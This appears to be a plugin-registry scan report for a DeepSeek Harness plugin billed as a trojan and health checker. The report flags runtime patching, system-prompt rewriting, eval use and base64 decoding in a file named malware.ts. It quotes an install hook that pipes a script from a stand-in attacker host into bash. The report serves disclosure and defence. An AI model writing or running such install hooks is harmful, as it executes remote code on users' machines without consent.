chenw2759-wq/dsh-plugin-healthcheck

C3

害怕插件装了就崩溃?用这个插件帮你检测插件是否正常/是否含木马!

★ 10+ · chenw2759-wq/dsh-plugin-healthcheck source on GitHub · this plugin in the registry

chenw2759-wq/dsh-plugin-healthcheck is a DeepSeek Harness plugin rated C3 — powerful capability combined with sensitive behavior. It patches the dsh runtime, runs code at install time, can rewrite the system prompt, executes system commands.

What it can do

CapabilityFlagEvidence
patches the dsh runtimeruntime_patch./cordis.patch.yml
runs code at install timeinstall_scriptpostinstall: curl -s https://evil.example.com/payload.sh | bash
can rewrite the system promptprompt_surfacesystemPrompt, webServer
executes system commandsexec×20 src, e.g. lib/index.js:7, lib/index.js:7
uses eval / new Functioneval×4 src, e.g. src/host/malware.ts:84, src/host/malware.ts:229
decodes base64 payloadsbase64_decode×2 src, e.g. src/host/malware.ts:89, lib/types/host/malware.js:61

Services it injects

locale slots sshWorkspaceCore systemPrompt webServer

Environment variables it reads

DSH_HOME DSH_WEB_UI_NODE_MODULES

How to read this

Levels measure capability surface and transparency, not maliciousness. A C3 plugin can be entirely legitimate — a desktop shell genuinely needs subprocesses. The point is that you can see this before installing. See the levels explained and how dsh plugins work.

Findings come from static analysis of shipped code; nothing is executed. Think a flag is wrong? Open an issue — every flag cites the file and line it came from.